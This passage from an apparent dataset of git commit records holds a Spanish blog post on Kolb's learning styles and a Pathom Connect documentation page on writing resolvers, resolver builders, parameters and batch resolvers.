cuestionamientos.\n\n|Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.\n\n|Pr\u00e1gm\u00e1ticos\n\n\n|Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. *La pregunta que quieren responder es: _\u00bfQu\u00e9 pasar\u00eda si?_*\n\n\n|Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.\n\n\n|Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.\n\n|===\n\n\n\nNOTE: Bibliograf\u00eda\n\n* Maria Victoria Gonz\u00e1lez Clavero (2011). Estilos de aprendizaje y su influencia para aprender a aprender. Universidad Central \u201cMarta Abreu\u201d de Las Villas. Santa - Cuba. mariag@uclv.edu.cu http:\/\/goo.gl\/fuDZPb\n\n* Secretar\u00eda de Educaci\u00f3n P\u00fablica - M\u00e9xico (2005). Manual de estilos de aprendizaje, Material autoinstitucional para docentes y orientadores educativos. http:\/\/goo.gl\/ZAeldY\n\n* John Stephenson, Albert Sangr\u00e0 (2009). Fundamentos del dise\u00f1o t\u00e9cnico-pedag\u00f3gico en e-learning. https:\/\/goo.gl\/BGAm5A\n\n\n","old_contents":"= Un vistazo a los estilos de aprendizaje\n:hp-tags: e-learning, innovaci\u00f3n, estilos de aprendizaje,TIC, educaci\u00f3n\n:published_at: 2016-07-12\n\n\nDentro de las diversas acciones que un docente desarrolla en clase siempre debe tomar en cuenta los divesos estilos de aprendizaje de sus estudiantes, de esta manera podemos asegurar que cada actividad podr\u00e1 generar un mejor aprendizaje en cada uno de ellos y responder a la diversidad de caracter\u00edsiticas de los mismo.\n\n== Estilos de aprendizaje\n\n\n\nEl emplear metodolog\u00edas que apunten a mantener como eje central al estudiante deber\u00e1n tomar en cuenta la heterogeneidad del grupo y trabajar (planificando y aplicado) diversas estrategias did\u00e1ctiva que permitan justamente que todo el grupo genere un aprendizaje significativo. Para esto imprescindible el proponer actividades direccionadas a sus estilos de aprendizaje, por ello, se revisar\u00e1 algunas de ellas con sus caracter\u00edsticas.\n\nimage:https:\/\/s20.postimg.org\/bt67sp50t\/estilos4.png[Estilos de aprendizaje,]\n\nRefiri\u00e9ndose al tema Laura Frade, articula ocho capacidades que deben tener los docentes, estas capacidades interact\u00faan entre s\u00ed para dar como resultado la \u00f3ptima formaci\u00f3n de los estudiantes:\n\n1. Capacidad diagn\u00f3stica: capacidad de detectar las necesidades de aprendizaje del estudiante, alienearla a un estilo de aprendizaje y vincularla con una estrategia de aprendizaje.\n\n2. Capacidad cognitiva: capacidad que guarda relaci\u00f3n con la adquisici\u00f3n del conocimiento necesario para impartir los contenidos tem\u00e1ticos.\n\n3. Capacidad \u00e9tica: capacidad que incide en la toma de decisiones del docente sobre su compromiso ante la sociedad, la responsabilidad de trabajo, los valores que promover\u00e1, los juicios de valor que emitir\u00e1, la priorizaci\u00f3n del desarrollo de los estudiantes, la preocupaci\u00f3n sobre su futuro laboral.\n\n4. Capacidad l\u00f3gica: capacidad para organizar el contenido tem\u00e1ticos de forma l\u00f3gica-secuencial. Se demuestra por su, orden, graduaci\u00f3n y dosificaci\u00f3n.\n\n5. Capacidad emp\u00e1tica: capacidad que permite entender a los estudiantes en tres diferentes planos: afectivo, cognitivo y psicomotriz.\n\n6. Capacidad comunicativa: habilidad para lograr la mediaci\u00f3n entre el aprendizaje y la ense\u00f1anza.Se evidencia en el uso de los diferentes tipos de lenguaje que posibiliten al estudiante apropiarse del conocimiento y hacer su propia construcci\u00f3n significativa, lo que les permitir\u00e1 aprender para la vida.\n\n7. Capacidad l\u00fadica: capacidad que permite dise\u00f1ar y aplicar diversas estrategias de ense\u00f1anza-aprendizaje.\n\n8. Capacidad metacognitiva: capacidad para evaluar el proceso ense\u00f1anza-aprendizaje en dos v\u00edas: hacia los alumnos verificando avances y estableciendo medidas correctivas, pero adem\u00e1s hacia su propio desempe\u00f1o como docente, lo que le permitir\u00e1 mejorar d\u00eda a d\u00eda en su profesi\u00f3n.\n\nSi nosotros como docentes contamos con estas habilidades, aseguraremos un buen trabajo con nuestros estudiantes.\n\n=== \u00bfQu\u00e9 son?\n\nSe definen como las distintas maneras en que un individuo puede aprender; para Alonso y Gallego (1994) los estilos de aprendizaje son los rasgos cognitivos, afectivos y fisiol\u00f3gicos que sirven como indicadores relativamente estables de c\u00f3mo los alumnos perciben interacciones y responden a sus ambientes de aprendizaje.\n\nSe cree que todas las personas emplean un m\u00e9todo particular de interacci\u00f3n, aceptaci\u00f3n y procesado de est\u00edmulos e informaci\u00f3n. Las caracter\u00edsticas sobre estilo de aprendizaje suelen formar parte de cualquier informe psicopedag\u00f3gico que se elabore sobre un estudiante, y debiera ser el fundamento de las estrategias did\u00e1cticas y refuerzos pedag\u00f3gicos para que estos sean los m\u00e1s adecuados para el alumno.\n\nLos diversos investigadores que han propuesto alg\u00fan estilo de aprendizaje en cierto difieren de los componentes de los estilos de aprendizaje; sin embargo estos ser\u00edan algunos de los m\u00e1s empleados:\n\n* Condiciones ambientales\n* Bagaje cultural\n* Edad\n* Preferencias de agrupamiento (se refiere a si se trabaja mejor individual-\nmente o en equipo)\n* Estilo seguido para la resoluci\u00f3n de problemas\n* Tipo de motivaci\u00f3n, locus de control interno o externo\n\nEl analizar los diferentes estilos de aprendizjae que tienen nuestros estudiantes sin lugar a dudas permitir\u00e1 que podamos tomar decisiones dirigidas a satisfacer cada necesidad singular en el grupo y con ellos que el conjunto de estudiantes logre la asimilizaci\u00f3n de conocimientos planificiada o quiz\u00e1s una superior.\n\n\n=== Clasificaci\u00f3n\n\nLos modelos existentes sobre estilos de aprendizaje ofrecen un marco conceptual para entender los comportamientos observados en el aula, los cuales brindan una\nexplicaci\u00f3n sobre la relaci\u00f3n de esos comportamientos con la forma en que est\u00e1n aprendiendo los alumnos y el tipo de estrategias de ense\u00f1anza que pueden resultar m\u00e1s eficaces en un momento determinado, ya sea por el contendido tem\u00e1tico en s\u00ed, o bien por las diversas interacciones sociales que se desarrollan en el aula.\n\n\nDe esta manera tenemos varias clasificaciones las cuales se muestran en la siguiente tabla:\n\n\nimage:https:\/\/s20.postimg.org\/6t8rkqze5\/estilos1.png[Calsificaci\u00f3n estilos de apredizaje, 800,400 role=right]\n\n=== Modelo de Kolb\n\nEl aprendizaje experiencial progresa a trav\u00e9s de un ciclo de actividades a las que se conoce habitualmente como ciclo de aprendizaje de Kolb (David Kolb, 1984). \n\nEl ciclo tiene cuatro componentes, cada uno de los cuales plantea retos concretos a la hora de planificar actividades acad\u00e9micas.\n\nimage:http:\/\/image.slidesharecdn.com\/estilos-de-aprendizaje-k-o-l-b2165\/95\/estilos-de-aprendizaje-k-o-l-b-5-728.jpg [ciclos modelo kolb]\n\nAcorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.\n\n* Activo\n* Reflexivo\n* Te\u00f3rico\n* Pragm\u00e1tico\n\n\n\n=== Car\u00e1ter\u00edsticas de cada estilo \n\nPara lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:\n\n\n[cols=\"1,2,1,1\", options=\"header,footer,autowidth\"]\n.Caracter\u00edsticas Estilos de parendizaje modelo Kolb\n|===\nEstilo |Caracter\u00edstica General |Cuando facilita el aprendizaje |Cuando NO facilita el aprendizaje.\n|Activos\n\n|Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos. \n*La pregunta que buscan responder en el aprendizaje es: _\u00bfC\u00f3mo?_*\n\n|Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.\n\n|Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.\n\n|Reflexivo\n\n\n|Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. *La pregunta que quieren responder con el aprendizaje es: _\u00bfPor qu\u00e9?_*\n\n|Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.\n\n|Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren. \n\n|Te\u00f3ricos\n\n|Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. *La pregutna que quieren responder es: _\u00bfQu\u00e9?_*\n\n|Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.\n\n|Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.\n\n|Pr\u00e1gm\u00e1ticos\n\n\n|Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. *La pregunta que quieren responder es: _\u00bfQu\u00e9 pasar\u00eda si?_*\n\n\n|Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.\n\n\n|Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.\n\n|===\n\n\n\nNOTE: Bibliograf\u00eda\n\nDra. Lourdes Galeana (2007). Aprendizaje Basado en proyectos. Universidad de Colima. http:\/\/goo.gl\/wzvMrG\n\nMaria Victoria Gonz\u00e1lez Clavero (2011). Estilos de aprendizaje y su influencia para aprender a aprender. Universidad Central \u201cMarta Abreu\u201d de Las Villas. Santa - Cuba. mariag@uclv.edu.cu http:\/\/goo.gl\/fuDZPb\n\nSecretar\u00eda de Educaci\u00f3n P\u00fablica - M\u00e9xico (2005). Manual de estilos de aprendizaje, Material autoinstitucional para docentes y orientadores educativos. http:\/\/goo.gl\/ZAeldY\n\nJohn Stephenson, Albert Sangr\u00e0 (2009). Fundamentos del dise\u00f1o t\u00e9cnico-pedag\u00f3gico en e-learning. https:\/\/goo.gl\/BGAm5A\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"99794e6329fff28a4db3dac43a84d3bcea3d296e","subject":"Add docs for new resolver builders","message":"Add docs for new resolver builders\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/connect\/resolvers.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/connect\/resolvers.adoc","new_contents":"= Resolvers\n\nIn `Connect`, you implement the graph by creating `resolvers`. Those resolvers are functions that expose some data on the graph.\n\nA resolver has a few basic elements:\n\n. Inputs \u2013 A set of attributes that are required to be in the current parsing context\nfor the resolver to be able to work. Inputs is optional, no inputs means that the\nresolver is always capable of working, independently of the current parsing context.\n. Outputs - A query-like notation representing the shape of data the resolver is able\nto resolve. This is typically a list of attributes\/joins, where joins\ntypically include a simple subquery.\n. A function - A `(fn [env input-data] tree-of-promised-output)` that takes the inputs\nand turns them into a tree that satisfies the \"output query\".\n\nSo you might define a resolver like this:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver\n [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)\n :person\/first-name (:first-name person)}))\n----\n\nTIP: If you use link:https:\/\/cursive-ide.com\/[Cursive], you can ask it to resolve the `pc\/defresolver` as a `defn` and you will get proper symbol resolution\n\nWhere the `database` in the environment would be supplied when running the parser, and the input would have to be\nfound in the current context. Remember that graph queries are contextual... you have to have a starting node to work\nfrom, so in the above example we're assuming that during our parse we'll reach a point where the context contains\na `:person\/id`. The `my-database` stuff is just made up for this example, and is intended to show you that your\ndata source does not need to remotely match the schema of your graph query.\n\nPathom will scan through the defined resolvers in order to try to satisfy all of the properties in a query. So, technically\nyou can split up your queries as much as makes sense into separate resolvers, and as long as the inputs are in the context\nPathom will assemble things back together.\n\nOf course, it doesn't make sense in this case to do so, because each resolver would end up running a new query:\n\n[source,clojure]\n----\n(pc\/defresolver person-age-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)}))\n\n(pc\/defresolver person-first-name-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name]}\n (let [person (my-database\/get-person database id)]\n {:person\/first-name (:first-name person)}))\n\n...\n----\n\nThe point is that a single-level query like `[:person\/id :person\/first-name :person\/age]` can be satisfied and \"folded together\"\nby Pathom over any number of resolvers.\n\nThis fact is the basis of parser (de)composition and extensibility. It can also come in handy for performance\nrefinements when there are computed attributes.\n\n== Derived\/Computed Attributes\n\nThere are times when you'd like to provide an attribute that is computed in some fashion. You can, of course, simply\ncompute it within the resolver along with other properties like so:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/full-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name\n :person\/full-name (str first-name \" \" last-name) ; COMPUTED\n ...}))\n----\n\nbut this means that you'll take the overhead of the computation when *any* query relate to person comes up. You can\ninstead spread such attributes out into other resolvers as we discussed previously, which will only be invoked if the\nquery actually asks for those properties:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name}))\n\n(pc\/defresolver person-name-resolver [_ {:person\/keys [first-name last-name]}]\n {::pc\/input #{:person\/first-name :person\/last-name}\n ::pc\/output [:person\/full-name]}\n {:person\/full-name (str first-name \" \" last-name)})\n----\n\nThis combination of resolvers can still resolve all of the properties in `[:person\/full-name :person\/age]` (if\n`:person\/id` is in the context), but a query for just `[:person\/age]` won't invoke any of the logic for the\n`person-name-resolver`.\n\n== Single Inputs -- Establishing Context [[SingleInputs]]\n\nSo far we have seen how to define a resolver that can work *as long as* the inputs are already in the environment. You're\nalmost certainly wondering how to do that.\n\nOne way is to define <<GlobalResolvers,global resolvers>> and start the query from them, but very often you'd just\nlike to be able to say \"I'd like the first name of person with id 42.\"\n\nEQL uses \"idents\" to specify exactly that sort of query:\n\n[source,clojure]\n----\n[{[:person\/id 42] [:person\/first-name]}]\n----\n\nThe above is a join on an ident, and the expected result is a map with the ident as a key:\n\n[source,clojure]\n----\n{[:person\/id 42] {:person\/first-name \"Joe\"}}\n----\n\nThe query *itself* has everything you need to establish the *context* for running the `person-resolver`,\nand in fact that is how Pathom single-input resolvers work.\n\nIf you use an ident in a query then Pathom is smart enough to know that it can use that ident to establish the context\nfor finding resolvers. In other words, in the query above the ident `[:person\/id 42]` is turned\ninto the *parsing context* `{:person\/id 42}`, which satisfies the *input* of any resolver that needs\n`:person\/id` to run.\n\n== Resolver Without Input -- Global Resolver [[GlobalResolvers]]\n\nA resolver that requires no input can output its results at any point in the graph, thus it is really a global resolver.\nPay a particular attention to the *\"at any point in the graph\"* - it's not just at the root. Thus, a resolver without inputs\ncan \"inject\" its outputs into any level of the query graph result.\n\nWe're going to start building a parser that can satisfy queries about a music store. So, we'll start with a global resolver\nthat can resolve the \"latest product\". The code below shows the entire code needed, boilerplate and all:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started.cljs[]\n----\n\nOur first resolver exposes the attribute `::latest-product`, and since it doesn't require any input it is a global resolver.\nAlso, note that our output description includes the full output details (including nested attributes), this is mostly\nuseful for auto-completion on UI's and automatic testing. If you return extra data it will still end up in the output\ncontext.\n\nTry some of these queries on the demo below:\n\n[source,clojure]\n----\n[::latest-product]\n[{::latest-product [:product\/title]}]\n\n; ::latest-product can be requested anywhere\n[{::latest-product\n [* ::latest-product]}]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started\" class=\"loader\">\n[::latest-product]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== Resolvers with single input\n\nNext, let's say we want to have a new attribute which is the brand of the product. Of course, we could just throw the\ndata there in our other resolver, but the real power of Connect comes out when we start splitting the responsibilities\namong resolvers, so let's define a resolver for brand that requires an input of `:product\/id`:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started2.cljs[]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started2\" class=\"loader\">\n[{::latest-product [:product\/title :product\/brand]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nThe input is a `set` containing the keys required on the current entity in the parsing context for the resolver to be\nable to work. This is where `Connect` starts to shine because any time your query asks for a bit of data\nit will try to figure it out how to satisfy that request based on the attributes that the current contextual entity *already has*.\n\nMore importantly: `Connect` will *explore the dependency graph* in order to resolve things if it needs to!\nTo illustrate this, let's pretend we have some external ID for the brand and that we can derive this ID from the\nbrand string - pretty much just another mapping:\n\n[source,clojure]\n----\n;; a silly pretend lookup\n(def brand->id {\"Taylor\" 44151})\n\n(pc\/defresolver brand-id-from-name [_ {:keys [product\/brand]}]\n {::pc\/input #{:product\/brand}\n ::pc\/output [:product\/brand-id]}\n {:product\/brand-id (get brand->id brand)})\n\n(comment\n (parser {} [{::latest-product [:product\/title :product\/brand-id]}])\n ; => #::{:latest-product #:product{:title \"Acoustic Guitar\", :brand-id 44151}}\n)\n----\n\nNote that our query never said anything about the `:product\/brand`. `Connect` automatically walked the path\n`:product\/id -> :product\/brand -> :product\/brand-id` to obtain the information desired by the query!\n\nWhen a required attribute is not present in the current entity, `Connect` will look for resolvers that can fetch it,\nanalyze their inputs, and recursively walk backwards towards the \"known data\" in the context.\nWhen a required attribute is not present in the current entity, `Connect` will calculate the possible paths\nfrom the data you have to the data you request, then it can use some heuristic to decide which path to take\nand walk this path to reach the data, if there is no possible path connect reader will return `::p\/continue` to\nlet another reader try to handle that key. You can read more about how this works in the Index page.\n\nAlso remember that single-input resolvers can handle ident-based queries.\nThus, the following ident-join queries already work without having to define anything else:\n\n[source,clojure]\n----\n(parser {} [{[:product\/id 1] [:product\/brand]}])\n; => {[:product\/id 1] #:product{:brand \"Taylor\"}}\n\n(parser {} [{[:product\/brand \"Taylor\"] [:product\/brand-id]}])\n; => {[:product\/brand \"Taylor\"] #:product{:brand-id 44151}}\n----\n\n== Multiple inputs\n\nThe input to a resolver is a set, and as such you can require more than one thing as input to your resolvers. When doing\nso, of course, your resolver function will receive all of the inputs requested; however, this also means that the parsing\ncontext needs to contain them, or there must exist other resolvers that can use what's in the context to fill them in.\n\nAs you have seen before, the only way to provide ad-hoc information to connect is using the ident query, but in the ident\nitself you can only provide one attribute at a time.\n\nSince version `2.2.0-beta11` the ident readers from connect (`ident-reader` and `open-ident-reader`) support adding extra\ncontext to the query using parameters. Let's say you want to load some customer data but you want to reduce the number\nof resolvers called by providing some base information that you already have, you can issue a query like this:\n\n[source,clojure]\n----\n[{([:customer\/id 123] {:pathom\/context {:customer\/first-name \"Foo\" :customer\/last-name \"Bar\"}})\n [:customer\/full-name]}]\n----\n\n== Resolver builders\n\nThere are some common resolver patterns that emerge from usage, Pathom connect provides\nhelpers for such cases, the next sections describes the Connect core available helpers.\n\n=== Alias resolvers\n\nSometimes you might want to make an alias, that is, create a resolver which just converts one\nname to another. For example:\n\n[source,clojure]\n----\n(pc\/defresolver alias-youtube-video [env {:user\/keys [youtube-video-url]}]\n {::pc\/input #{:user\/youtube-video-url}\n ::pc\/output [:youtube.video\/id]}\n {:youtube.video\/id youtube-video-url})\n----\n\nThe previous resolver will convert `:user\/youtube-video-url` to `:youtube.video\/id`. To make\nthat easy, Pathom provides some helpers:\n\n[source,clojure]\n----\n; this returns a resolver that works just like the previous resolver\n(def alias-youtube-video (pc\/alias-resolver :user\/youtube-video-url :youtube.video\/id))\n----\n\nIf you want to create an alias that goes in both directions, use `pc\/alias-resolver2`.\n\n=== Constant resolvers\n\nThis is a resolver that always returns a constant value for a given key. A common use\ncase is use this to set some default.\n\n[source,clojure]\n----\n; using helper\n(def answer-to-everything\n (pc\/constantly-resolver :douglas.adams\/answer-to-everything 42))\n\n; is equivalente to:\n(pc\/defresolver answer-to-everything [_ _]\n {::pc\/output [:douglas.adams\/answer-to-everything]}\n {:douglas.adams\/answer-to-everything 42})\n----\n\n=== Single attribute resolvers\n\nFor cases of a single transition from one attribute to another, you can use the\n`single-attr-resolver` helper:\n\n[source,clojure]\n----\n; convertion fn\n(defn fahrenheit->celcius [x]\n (-> x (- 32) (* 5\/9)))\n\n; resolver with helper\n(def f->c-resolver\n (pc\/single-attr-resolver :unit\/fahrenheit :unit\/celcius fahrenheit->celcius))\n\n; is equivalent to:\n(pc\/defresolver answer-to-everything [_ {:keys [unit\/fahrenheit]}]\n {::pc\/input #{:unit\/fahrenheit}\n ::pc\/output [:unit\/celcius]}\n {:unit\/celcius (fahrenheit->celcius fahrenheit)})\n----\n\nSometimes you also need to get some data from the environment, for those cases use\n`single-attr-resolver2`, the difference is that this one will send `env` and the value\ninput as arguments to the provided function:\n\n[source,clojure]\n----\n(defn single-with-env [env value]\n (* value (::multiplier env))\n\n(def env-demo-resolver\n (pc\/single-attr-resolver ::some-value ::other-value single-with-env))\n\n; is equivalent to\n(pc\/defresolver answer-to-everything [env {::keys [some-value]}]\n {::pc\/input #{::some-value}\n ::pc\/output [::other-value]}\n {::other-value (single-with-env env some-value)})\n----\n\n== Parameters\n\nParameters enable another dimension of information to be added to the request. Params have\ndifferent semantics from inputs: inputs are more a `dependency` thing while params are\nmore like options. In practice, the main difference is that inputs are something Pathom\nwill try to look up and make available, while parameters must always be provided at\nquery time, there have no auto resolution.\nCommon cases to use parameters are: pagination, sorting, filtering...\n\nLet's write a resolver that outputs a sequence of instruments which can optionally be sorted\nvia a sorting criteria specified via a parameter.\n\n[source,clojure]\n----\n(pc\/defresolver instruments-list [env _]\n {::pc\/output [{::instruments [:instrument\/id :instrument\/brand\n :instrument\/type :instrument\/price]}]}\n (let [{:keys [sort]} (-> env :ast :params)] ; <1>\n {::instruments (cond->> instruments\n (keyword? sort) (sort-by sort))}))\n----\n\n<1> Pulls the parameters from the environment\n\nThen we can run queries like:\n\n[source,clojure]\n----\n[(::instruments {:sort :instrument\/brand})]\n[(::instruments {:sort :instrument\/price})]\n[(::instruments {:sort :instrument\/type})]\n\n; params with join\n\n[{(::instruments {:sort :instrument\/price})\n [:instrument\/id\n :instrument\/brand]}]\n----\n\nTry it out:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.parameters\" class=\"loader\">\n[(::instruments {:sort :instrument\/price})]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== N+1 Queries and Batch resolvers\n\nWhen you have a to-many relation that is being resolved by a parser, you will typically end up with a single query that\nfinds the \"IDs\", and then `N` more queries to fill in the details of each item in the sequence. This is known as the\n`N+1` problem, and can be a source of significant performance problems.\n\nInstead of running a resolver once for each item on the list, the idea to solve this problem is to send all the inputs\nas a sequence, so the resolver can do some optimal implementation to handle multiple items. When this happens,\nwe call it a batch resolver. For example, let's take a look at the following demo:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNOTE: This demo is using Pathom async parsers. The resolvers in async parsers can return channels that (eventually)\nresolve to the result, which is why you see `go` blocks in the code. See <<AsyncParsing, Async Parsing>> for more details.\nWe use them in this demo so we can \"sleep\" in a Javascript environment to mimic overhead in processing.\nIn the rest of the book we recommend using the parallel parser, the reason to use the async parser in this demo is\nthat it more easily demonstrates the `N+1` issue.\n\nYou can note by the tracer that it took one second for each entry, a clear cascade,\nbecause it had to call the `:number-added` resolver once for each item.\n\nWe can improving that by turning this into a batch resolver, like this:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch2.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch2\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNote that this time the sleep of one second only happened once, this is because when Pathom is processing a list and the\nresolver supports batching, the resolver will get all the inputs in a single call, so your batch resolver can get all\nthe items in a single iteration. The results will be cached back for each entry, this will make the other items hit the\ncache instead of calling the resolver again.\n\n=== Batch transforms [[resolver-batch-transform]]\n\nStarting on version `2.2.0` Pathom add some helpers to facilitate the creation of batch resolvers using Pathom\n<<connect-transform,transform>> facilities.\n\nIn the previous example we manually detected if input was a sequence, this API is made this way so the resolver\nkeeps compatibility with the regular resolver API, but often it is easier if you get a consistent input (always a sequence\nfor example). We can enforce this using a transform:\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ input]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; use the transform, note we removed ::pc\/batch? true, that's because the transform\n ; will add this for us\n ::pc\/transform pc\/transform-batch-resolver}\n (go\n (async\/<! (async\/timeout 1000))\n ; no need to detect sequence, it is always a sequence now\n (mapv (fn [v] {:number-added (inc (:number v))}) input)))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch3\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nAnother helper that Pathom provides is to transform a serial resolver that would run\none by one, into a batch that runs at concurrency `n`.\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ {:keys [number]}]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; set auto-batch with concurrency of 10\n ::pc\/transform (pc\/transform-auto-batch 10)}\n (go\n (async\/<! (async\/timeout 1000))\n ; dealing with the single case, as in the first example we did on batch\n {:number-added (inc number)}))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.transform-auto-batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNote this time we did called resolver fn multiple times but in parallel, the way this may\nimpact the performance will vary case by case, I suggest giving some thought on the best\nstrategy for each case individually.\n\n=== Aligning results\n\nOften times when you do a batch request to some service\/api the results won't come in\nthe same order of the request, also the count might not match in case some of the items\non request were invalid. To facilitate the coding of these cases Pathom provides\na helper to correctly sort the results back, for more info check the docs about\nlink:https:\/\/cljdoc.org\/d\/com.wsscode\/pathom\/CURRENT\/api\/com.wsscode.pathom.connect#batch-restore-sort[batch-restore-sort on cljdoc].\n","old_contents":"= Resolvers\n\nIn `Connect`, you implement the graph by creating `resolvers`. Those resolvers are functions that expose some data on the graph.\n\nA resolver has a few basic elements:\n\n. Inputs \u2013 A set of attributes that are required to be in the current parsing context\nfor the resolver to be able to work. Inputs is optional, no inputs means that the\nresolver is always capable of working, independently of the current parsing context.\n. Outputs - A query-like notation representing the shape of data the resolver is able\nto resolve. This is typically a list of attributes\/joins, where joins\ntypically include a simple subquery.\n. A function - A `(fn [env input-data] tree-of-promised-output)` that takes the inputs\nand turns them into a tree that satisfies the \"output query\".\n\nSo you might define a resolver like this:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver\n [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)\n :person\/first-name (:first-name person)}))\n----\n\nTIP: If you use link:https:\/\/cursive-ide.com\/[Cursive], you can ask it to resolve the `pc\/defresolver` as a `defn` and you will get proper symbol resolution\n\nWhere the `database` in the environment would be supplied when running the parser, and the input would have to be\nfound in the current context. Remember that graph queries are contextual... you have to have a starting node to work\nfrom, so in the above example we're assuming that during our parse we'll reach a point where the context contains\na `:person\/id`. The `my-database` stuff is just made up for this example, and is intended to show you 